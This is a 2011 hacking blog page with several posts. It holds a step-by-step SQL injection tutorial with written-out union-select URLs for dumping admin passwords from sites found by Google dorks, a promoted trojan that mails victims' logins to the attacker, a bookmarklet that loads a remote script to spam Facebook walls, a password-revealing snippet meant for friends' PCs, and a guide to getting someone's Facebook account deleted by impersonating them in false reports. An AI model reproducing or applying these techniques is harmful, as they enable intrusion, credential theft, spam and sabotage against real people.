11.16.2011

Hacking Websites

Before we see what SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

eMail Hacker



What does "Mail Hacker" Do ?

Well its quite simple....Before you understand take a look at the Screenshot below so that everything is clear.Then I'll Explain

Here is what to do !


You can also try this: Hack Facebook in 5 Simple ways !
1.So in the left hand side you gotto enter your details,Your "Username" and "Password"...Don't worry you won't get hacked.
2.Then click on the E-mail Service and then just select a "FileName" and Click on "Build"
3.Then you will find that your File is built in the same directory.
4.So once the person opens your "Server.exe" file he will find a dialogue box open as on the "Right hand side of the Screenshot"
5.So when the Victim opens the file he thinks it can hack e-mail IDs and will Quickly provide his personal Information before he enters the person who he wants to hack.
6.When he click on "Hack Him"....The Program secretly send the Login Information to "Your Mail" which you provided earlier...And then he gets a temporary error !

File Details:

Download: http://adf.ly/46611/facebook-hacking-software
File Size: 35 KB
File Extension: .rar (Compressed Archive)

If you have any problems then please post a comment and I'll get to you immediately.

11.10.2011

Facebook Spamming. How To ?



It is really annoying if your Facebook Wall is full with many messages. Recently I found the way of doing it and now i am sharing it with you people ;)

It is really easy to do it. All you need to do is to follow the following steps carefully.

#Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|


#Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:


javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0)  


#Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".


#Step4: After that type the message that you want to post and click on "OK"


After that its all done just refresh and you will Spam the other person.


Cool Javascripts for Facebook


here’s i am sharing with you some cool pieces of codes that you must try on your browser. Interestingly the JavaScripts listed below can be used to perform malicious activity or to spread SPAM by just modifying them or combining with few extra code. for example we have already seen the “Rotating images Facebook Spam” some days back. So Guys Before trying out any JavaScripts on any Websites, you got to first examine the code properly and see that it is not calling any external Script or contains any malicious code.
All the JavaScripts listed below are 100% safe and tested. use of these java scripts will not harm your PC and will not affect your ongoing processes. Copy-paste any javascript in the Address bar of your Browser and hit ‘enter’. To Stop the JavaScript actions, Just Refresh the current Tab of your Browser.

-JavaSript to Edit any Webpage!

The Below piece of JavaSript code lets you edit any Webpage in realtime. With Firefox, you can even edit and save the modified pages to your PC.
javascript:document.body.contentEditable='true'; document.designMode='on'; void (0);

-Webpage Content Killer -Destroy any Webpage.

Now this is my Favorite piece. This code lets you kill any objects in the webpage. This is fun just like playing ‘Asteroids’ game. Once you execute this code, you will see a white Arrow appearing on the top-left side of the page. This arrow acts as a TANK. To fire use ‘Space bar’, to move your Tank just use 4 ‘Arrow keys’. ‘Esc’ to stop the game.
javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://img.hacker9.com/hacker9/asteroids.min.js';void(0);

-The Calculator

In case if you are very quick in coding and don’t wanna use your inbuilt calculator, you can always use the below JavaScript to get the quick answer within your browser. you can replace 34343+3434-222 with expression of your choice.
javascript: alert(34343+3434-222);

-Floating or Dancing Images in Webpage

This piece of JavaScript pulls off all the images from any web page and rotates or float’s them in a circular ordr. The best place to test this Script will be a website with many images(for eg: any photo gallery or albums page) (Scroll Up to see the Action)
note: look carefully in the above code, its rotating the HTML “img” tag. Just replace it with “a” or “p” and watch some links or text rotate instead of images.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

-Shake your Browser Window!

This JavaScripts literally shakes your Browser window, must try.
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0);} } }} Shw(6)

-Reveal Password Behind Asterisk(*****) Using Javascript

This code reveals the hidden password string behind asterisk. to try this open any login page and type in your password. Paste the below javascript in address bar and press enter. This Script is of real use when tried on your friends PC.
javascript: alert(document.getElementById('Passwd').value);

-Java Script to Find Spoof Websites!

This Script lets you know the actual URL and the address URL of the page. and thus helps you identifying Spoof Websites!
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

-Select All JavaScript for Facebook users.

This Script lets you select all your friends while Sending Invitations. You are always welcome to Try this Script on Our Facebook Page!
javascript:fs.select_all()
And Finally make sure you also try this:
javascript:function reverse() { var inp = " /m\ .gnirolpxE peeK !setadpu liame eerf ruo ot ebircsbus uoy erus ekaM .su htiw hcuot nI yatS !sihT deyojne uoy epoh I "; var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();

11.07.2011

Delete Facebook Account Without Accessing Account of Victim

Recently i posted a tutorial on "How to hack a Facebook account easily without any hacks".So this post is similar to the previous one but much more destructive than it.In this article I will be telling you how to lock/delete your friend's Facebook Account.Thistricks has been recently tested by me and is confirmed to be 100% working !




What you will be needing ?

1.Victim's Profile Link - ex.http://www.facebook.com/profile.php?id=112741086148511
2.Victim's Email - Which is being used to log into his Facebook Account.
3.Victim's Birthday - Can be found out easily if you know the victim personally or you can use social engineering to get the password !
4. Make an Email ID on Gmail or Yahoo with the same First name and Last name same as on victim's Facebook profile.

So you have to make sure you do the above steps in order to proceed.

How to do it ?

1.Go to this link :

http://www.facebook.com/help/contact.php?show_form=hack_nologin_access

2.Enter the appropriate details in the above page.In the TextBox "Email address where you can be contacted" enter the fake E-mail which you created.

3. You will get a mail on that ID in which Facebook Staff will ask your problem. Reply to them that you are "Someone"(Victim's name) and your unable to access your Facebook account. Also you have lost access to your Email Address associated with the account. You don't know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action to delete the account or something like that !(No need though in 100 % cases they delete the account).

4. After 2-3 days you will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.

5.After that,the Facebook staff will automatically delete your Account in order to keep your privacy !

Thats it ! Your done with this simple trick !

Hope you like this article.Feel free to comment ,share and subscribe if you liked this !